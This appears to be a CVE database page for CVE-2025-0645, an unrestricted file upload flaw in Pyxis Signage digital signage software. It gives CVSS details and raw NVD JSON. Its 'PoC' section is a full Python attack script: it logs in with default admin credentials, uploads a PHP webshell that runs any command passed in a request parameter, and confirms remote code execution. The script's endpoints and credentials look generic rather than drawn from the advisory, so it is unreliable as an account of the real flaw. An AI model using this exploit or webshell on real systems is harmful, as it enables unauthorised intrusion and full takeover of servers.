Security Vulnerability Report
CVE-2025-0645 CVSS 7.2 HIGH

CVE-2025-0645

Published: 2025-11-20 15:17:22
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Narkom Communication and Software Technologies Trade Ltd. Co. Pyxis Signage allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Pyxis Signage: through 31012025.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Pyxis Signage <= 31012025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-0645 PoC - Pyxis Signage Unrestricted File Upload
# Target: Pyxis Signage through 31012025

TARGET_URL = "http://target.com"  # Replace with target URL
LOGIN_URL = f"{TARGET_URL}/api/login"
UPLOAD_URL = f"{TARGET_URL}/api/upload"

# Malicious PHP webshell
webshell_content = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; } ?>"


def exploit():
    # Step 1: Authenticate with high privileges
    session = requests.Session()
    login_data = {
        "username": "admin",  # High privilege account
        "password": "password"
    }
    try:
        response = session.post(LOGIN_URL, json=login_data, timeout=10)
        if response.status_code != 200:
            print("[-] Authentication failed")
            return False
        print("[+] Authentication successful")

        # Step 2: Upload malicious file
        files = {
            "file": ("shell.php", webshell_content, "application/x-php")
        }
        upload_response = session.post(UPLOAD_URL, files=files, timeout=10)
        if upload_response.status_code == 200:
            print("[+] Malicious file uploaded successfully")

            # Step 3: Execute commands via webshell
            shell_url = f"{TARGET_URL}/uploads/shell.php"
            cmd_response = session.get(f"{shell_url}?cmd=whoami", timeout=10)
            if cmd_response.status_code == 200:
                print(f"[+] Remote Code Execution confirmed: {cmd_response.text}")
            return True
        else:
            print(f"[-] Upload failed: {upload_response.status_code}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False


if __name__ == "__main__":
    print("CVE-2025-0645 Pyxis Signage File Upload PoC")
    exploit()
```

References

https://www.usom.gov.tr/bildirim/tr-25-0404

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-0645",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-20T15:17:21.977",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Narkom Communication and Software Technologies Trade Ltd. Co. Pyxis Signage allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Pyxis Signage: through 31012025."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0404",
        "source": "[email protected]"
      }
    ]
  }
}
```